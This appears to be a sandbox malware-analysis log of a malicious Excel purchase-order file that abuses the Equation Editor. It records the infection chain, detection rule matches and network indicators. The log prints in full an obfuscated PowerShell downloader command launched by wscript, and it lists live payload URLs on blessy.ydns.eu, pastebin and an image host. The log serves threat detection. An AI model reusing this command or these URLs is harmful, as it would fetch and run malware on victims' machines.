Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: blessy.ydns.eu
Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsD
Source: EQNEDT32.EXE, 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsj
Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP
Source: EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.521632788.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.436029460.0000000002681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000005.00000002.409494402.0000000001FB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.408090678.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, prnportjjm[1].vbs.2.dr, prnport.vbs.2.dr String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/Sh
Source: wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/Th
Source: wscript.exe, 00000005.00000003.407232135.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.407990489.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/yk0CXsC5
Source: wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000008.00000002.441662069.00000000027BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000008.00000002.446551677.00000000050AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/00
Source: powershell.exe, 00000008.00000002.441374964.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.22:49164 version: TLS 1.2

System Summary

barindex
Source: sheet1.xml, type: SAMPLE Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: xF3wienia PO2102559-1.xlsx Stream path '\x1oLE10nATIVE' : 4,..~.G............................P.E.............................)D....-....Z...ku.v./o.X.P.7C3,y.UJ|.?o../Q..H.E.d2;n.....}+.!."v.hsfd+fQ+.'u&.m...9..Q.42m9nx...&)(~.XUXXPb(h.D..Nm /T%%`#Z&R |..ab..hT.#..w7.q8\..hmle.._.a.-E..Md,-/q.K..a.lfNh2....erW_...;.:/.................9....AX...,9..........$.........e18...H......ev......k.PW...|......-&..Dw..7t.._X...g6l5m.#.H.i..#3#.,......p.....r8DG..q...1c.@4. ..Hx'1.{Q,MA=vb.{.^.bE.# .-r.'P@...k]~s....B.X.^aT..[Wrqu.M>V..U(.HyQ8b.~H.>.u?Q..r:R.k..t[sZ#,u...6,.o{+.7..%@i7@{Y"...4.?lQ1.Y'.vI_Q< \G.]W0C5Ry...|..ad...W%zj2.T80A&1.Lz._.=.;.\1.w/s.M .!x.o7Y@*_s.2c.5R.1y..KxV..<n84[p1wsw.o9,0._.~..i2.Gt2\.K.@.0U8.m_o..L~.VW...$.B.N2IC UCj3e.'z:.#|.Di.z&.o.h-L.u[..Cx.._..k..|?,o.gU(..,..p0#"mPdao).iP"`e...L&8&9|.^..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 8794
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 8794 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_002554A0 8_2_002554A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00382DF8 8_2_00382DF8
Source: F0B5.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sheet1.xml, type: SAMPLE Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winXLSX@12/15@10/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$xF3wienia PO2102559-1.xlsx Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR81FB.tmp Jump to behavior
Source: xF3wienia PO2102559-1.xlsx OLE indicator, Workbook stream: true
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................(.P.....`.......h.......0.......$K.........................s..............*............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......D.......1K.........................s............H.................*............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................r.e.s.o.l.v.e.d.:. .'.a.j.a.i...y.d.n.s...e.u.'."..................s............H.......2.......H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......0.......VK.........................s............H...............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2.0.0...iK.........................s............H.......&.......H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......0.......uK.........................s............H...............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................(.P.....`.......h.......0........K.........................s..............*.............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h................K.........................s............H.................*............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................(.P.....`.......h................K.........................s..............*.............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......0........K.........................s............H.................*............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................(.P.....`.......h.......0........K.........................s..............*.............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......0........K.........................s............H.................*............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..*.....................................(.P.....`.......h.......D........K.........................s..............*.....T.......H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......D........K.........................s............H.................*............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....`.......h.......0........L.........................s............H...............H.&............. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....`.......h.......D........L.........................s............H...............H.&............. Jump to behavior
